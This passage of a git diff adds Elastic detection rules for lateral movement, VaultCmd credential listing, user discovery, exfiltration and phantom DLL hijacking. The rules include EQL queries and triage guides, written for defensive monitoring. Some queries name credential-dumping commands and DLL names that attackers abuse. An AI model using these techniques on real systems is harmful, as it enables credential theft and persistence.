"https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + } + ], + "type": "machine_learning", + "version": 4 + }, + "id": "bdfebe11-e169-42e3-b344-c5d2015533d3_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/be4c5aed-90f5-4221-8bd5-7ab3a4334751_3.json b/packages/security_detection_engine/kibana/security_rule/be4c5aed-90f5-4221-8bd5-7ab3a4334751_3.json new file mode 100644 index 00000000000..f7dbdaf5c59 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/be4c5aed-90f5-4221-8bd5-7ab3a4334751_3.json @@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "An anomaly detection job has detected a remote file transfer on an unusual directory indicating a potential lateral movement activity on the host. Many Security solutions monitor well-known directories for suspicious activities, so attackers might use less common directories to bypass monitoring.", + "from": "now-90m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_rare_file_path_remote_transfer", + "name": "Unusual Remote File Directory", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "be4c5aed-90f5-4221-8bd5-7ab3a4334751", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- File events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your file events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "be4c5aed-90f5-4221-8bd5-7ab3a4334751_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_108.json b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_108.json new file mode 100644 index 00000000000..6cc9d1723f0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_108.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Windows Credential Manager allows you to create, view, or delete saved credentials for signing into websites, connected applications, and networks. An adversary may abuse this to list or dump credentials stored in the Credential Manager for saved usernames and passwords. This may also be performed in preparation of lateral movement.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Searching for Saved Credentials via VaultCmd", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.pe.original_file_name:\"vaultcmd.exe\" or process.name:\"vaultcmd.exe\") and\n process.args:\"/list*\"\n", + "references": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://web.archive.org/web/20201004080456/https://rastamouse.me/blog/rdp-jump-boxes/", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "be8afaed-4bcd-4e0a-b5f9-5562003dde81", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.004", + "name": "Windows Credential Manager", + "reference": "https://attack.mitre.org/techniques/T1555/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "be8afaed-4bcd-4e0a-b5f9-5562003dde81_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_109.json b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_109.json new file mode 100644 index 00000000000..8979c718966 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_109.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Windows Credential Manager allows you to create, view, or delete saved credentials for signing into websites, connected applications, and networks. An adversary may abuse this to list or dump credentials stored in the Credential Manager for saved usernames and passwords. This may also be performed in preparation of lateral movement.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Searching for Saved Credentials via VaultCmd", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.pe.original_file_name:\"vaultcmd.exe\" or process.name:\"vaultcmd.exe\") and\n process.args:\"/list*\"\n", + "references": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://web.archive.org/web/20201004080456/https://rastamouse.me/blog/rdp-jump-boxes/", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "be8afaed-4bcd-4e0a-b5f9-5562003dde81", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.004", + "name": "Windows Credential Manager", + "reference": "https://attack.mitre.org/techniques/T1555/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "be8afaed-4bcd-4e0a-b5f9-5562003dde81_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_3.json b/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_3.json new file mode 100644 index 00000000000..2b61e79607c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_3.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of built-in tools which adversaries may use to enumerate the system owner/user of a compromised system.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "System Owner/User Discovery Linux", + "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and \nprocess.name : (\"whoami\", \"w\", \"who\", \"users\", \"id\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "bf8c007c-7dee-4842-8e9a-ee534c09d205", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1033", + "name": "System Owner/User Discovery", + "reference": "https://attack.mitre.org/techniques/T1033/" + }, + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "bf8c007c-7dee-4842-8e9a-ee534c09d205_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bfba5158-1fd6-4937-a205-77d96213b341_3.json b/packages/security_detection_engine/kibana/security_rule/bfba5158-1fd6-4937-a205-77d96213b341_3.json new file mode 100644 index 00000000000..b8e91cefea0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bfba5158-1fd6-4937-a205-77d96213b341_3.json @@ -0,0 +1,64 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected data exfiltration to a particular geo-location (by region name). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels.", + "from": "now-6h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "ded_high_sent_bytes_destination_region_name", + "name": "Potential Data Exfiltration Activity to an Unusual Region", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/ded", + "https://www.elastic.co/blog/detect-data-exfiltration-activity-with-kibanas-new-integration" + ], + "related_integrations": [ + { + "package": "ded", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "risk_score": 21, + "rule_id": "bfba5158-1fd6-4937-a205-77d96213b341", + "setup": "## Setup\n\nThe rule requires the Data Exfiltration Detection integration assets to be installed, as well as network and file events collected by integrations such as Elastic Defend and Network Packet Capture (for network events only). \n\n### Data Exfiltration Detection Setup\nThe Data Exfiltration Detection integration detects data exfiltration activity by identifying abnormalities in network and file events. Anomalies are detected using Elastic's Anomaly Detection feature. \n\n#### Prerequisite Requirements:\n- Fleet is required for Data Exfiltration Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Network events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) or [Network Packet Capture](https://docs.elastic.co/integrations/network_traffic) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To add the Network Packet Capture integration to an Elastic Agent policy, refer to [this](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html) guide.\n\n#### The following steps should be executed to install assets associated with the Data Exfiltration Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Data Exfiltration Detection and select the integration to see more details about it.\n- Under Settings, click Install Data Exfiltration Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Data Exfiltration Detection, you'll need to enable the corresponding Anomaly Detection jobs. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your network data. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `logs-network_traffic.*` if you used Network Packet Capture.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/ded/kibana/ml_module/ded-ml.json) configuration file, you will see a card for Data Exfiltration Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Data Exfiltration Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1041", + "name": "Exfiltration Over C2 Channel", + "reference": "https://attack.mitre.org/techniques/T1041/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "bfba5158-1fd6-4937-a205-77d96213b341_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_110.json b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_110.json new file mode 100644 index 00000000000..965b47c5ef8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_110.json @@ -0,0 +1,179 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the loading of a non Microsoft signed DLL that is missing on a default Windows install (phantom DLL) or one that can be loaded from a different location by a native Windows process. This may be abused to persist or elevate privileges via privileged file write vulnerabilities.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious DLL Loaded for Persistence or Privilege Escalation", + "note": "## Triage and analysis\n\n### Investigating Suspicious DLL Loaded for Persistence or Privilege Escalation\n\nAttackers can execute malicious code by abusing missing modules that processes try to load, enabling them to escalate privileges or gain persistence. This rule identifies the loading of a non-Microsoft-signed DLL that is missing on a default Windows installation or one that can be loaded from a different location by a native Windows process.\n\n#### Possible investigation steps\n\n- Examine the DLL signature and identify the process that created it.\n - Investigate any abnormal behaviors by the process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve the DLL and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "any where host.os.type == \"windows\" and\n (event.category : (\"driver\", \"library\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (\n /* compatible with Elastic Endpoint Library Events */\n (?dll.name : (\"wlbsctrl.dll\", \"wbemcomn.dll\", \"WptsExtensions.dll\", \"Tsmsisrv.dll\", \"TSVIPSrv.dll\", \"Msfte.dll\",\n \"wow64log.dll\", \"WindowsCoreDeviceInfo.dll\", \"Ualapi.dll\", \"wlanhlp.dll\", \"phoneinfo.dll\", \"EdgeGdi.dll\",\n \"cdpsgshims.dll\", \"windowsperformancerecordercontrol.dll\", \"diagtrack_win.dll\", \"oci.dll\", \"TPPCOIPW32.dll\", \n \"tpgenlic.dll\", \"thinmon.dll\", \"fxsst.dll\", \"msTracer.dll\")\n and (?dll.code_signature.trusted != true or ?dll.code_signature.exists != true)) or\n\n /* compatible with Sysmon EventID 7 - Image Load */\n (file.name : (\"wlbsctrl.dll\", \"wbemcomn.dll\", \"WptsExtensions.dll\", \"Tsmsisrv.dll\", \"TSVIPSrv.dll\", \"Msfte.dll\",\n \"wow64log.dll\", \"WindowsCoreDeviceInfo.dll\", \"Ualapi.dll\", \"wlanhlp.dll\", \"phoneinfo.dll\", \"EdgeGdi.dll\",\n \"cdpsgshims.dll\", \"windowsperformancerecordercontrol.dll\", \"diagtrack_win.dll\", \"oci.dll\", \"TPPCOIPW32.dll\", \n \"tpgenlic.dll\", \"thinmon.dll\", \"fxsst.dll\", \"msTracer.dll\") and \n not file.path : (\"?:\\\\Windows\\\\System32\\\\wbemcomn.dll\", \"?:\\\\Windows\\\\SysWOW64\\\\wbemcomn.dll\") and \n not file.hash.sha256 : \n (\"6e837794fc282446906c36d681958f2f6212043fc117c716936920be166a700f\", \n \"b14e4954e8cca060ffeb57f2458b6a3a39c7d2f27e94391cbcea5387652f21a4\", \n \"c258d90acd006fa109dc6b748008edbb196d6168bc75ace0de0de54a4db46662\") and \n not file.code_signature.status == \"Valid\")\n )\n", + "references": [ + "https://itm4n.github.io/windows-dll-hijacking-clarified/", + "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html", + "https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html", + "https://shellz.club/2020/10/16/edgegdi-dll-for-persistence-and-lateral-movement.html", + "https://windows-internals.com/faxing-your-way-to-system/", + "http://waleedassar.blogspot.com/2013/01/wow64logdll.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "dll.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.hash.sha256", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.001", + "name": "DLL Search Order Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_111.json b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_111.json new file mode 100644 index 00000000000..1042524f3eb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_111.json @@ -0,0 +1,179 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the loading of a non Microsoft signed DLL that is missing on a default Windows install (phantom DLL) or one that can be loaded from a different location by a native Windows process. This may be abused to persist or elevate privileges via privileged file write vulnerabilities.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.library*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious DLL Loaded for Persistence or Privilege Escalation", + "note": "## Triage and analysis\n\n### Investigating Suspicious DLL Loaded for Persistence or Privilege Escalation\n\nAttackers can execute malicious code by abusing missing modules that processes try to load, enabling them to escalate privileges or gain persistence. This rule identifies the loading of a non-Microsoft-signed DLL that is missing on a default Windows installation or one that can be loaded from a different location by a native Windows process.\n\n#### Possible investigation steps\n\n- Examine the DLL signature and identify the process that created it.\n - Investigate any abnormal behaviors by the process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve the DLL and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "any where host.os.type == \"windows\" and\n (event.category : (\"driver\", \"library\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (\n /* compatible with Elastic Endpoint Library Events */\n (?dll.name : (\"wlbsctrl.dll\", \"wbemcomn.dll\", \"WptsExtensions.dll\", \"Tsmsisrv.dll\", \"TSVIPSrv.dll\", \"Msfte.dll\",\n \"wow64log.dll\", \"WindowsCoreDeviceInfo.dll\", \"Ualapi.dll\", \"wlanhlp.dll\", \"phoneinfo.dll\", \"EdgeGdi.dll\",\n \"cdpsgshims.dll\", \"windowsperformancerecordercontrol.dll\", \"diagtrack_win.dll\", \"oci.dll\", \"TPPCOIPW32.dll\", \n \"tpgenlic.dll\", \"thinmon.dll\", \"fxsst.dll\", \"msTracer.dll\")\n and (?dll.code_signature.trusted != true or ?dll.code_signature.exists != true)) or\n\n /* compatible with Sysmon EventID 7 - Image Load */\n (file.name : (\"wlbsctrl.dll\", \"wbemcomn.dll\", \"WptsExtensions.dll\", \"Tsmsisrv.dll\", \"TSVIPSrv.dll\", \"Msfte.dll\",\n \"wow64log.dll\", \"WindowsCoreDeviceInfo.dll\", \"Ualapi.dll\", \"wlanhlp.dll\", \"phoneinfo.dll\", \"EdgeGdi.dll\",\n \"cdpsgshims.dll\", \"windowsperformancerecordercontrol.dll\", \"diagtrack_win.dll\", \"oci.dll\", \"TPPCOIPW32.dll\", \n \"tpgenlic.dll\", \"thinmon.dll\", \"fxsst.dll\", \"msTracer.dll\") and \n not file.path : (\"?:\\\\Windows\\\\System32\\\\wbemcomn.dll\", \"?:\\\\Windows\\\\SysWOW64\\\\wbemcomn.dll\") and \n not file.hash.sha256 : \n (\"6e837794fc282446906c36d681958f2f6212043fc117c716936920be166a700f\", \n \"b14e4954e8cca060ffeb57f2458b6a3a39c7d2f27e94391cbcea5387652f21a4\", \n \"c258d90acd006fa109dc6b748008edbb196d6168bc75ace0de0de54a4db46662\") and \n not file.code_signature.status == \"Valid\")\n )\n", + "references": [ + "https://itm4n.github.io/windows-dll-hijacking-clarified/", + "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html", + "https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html", 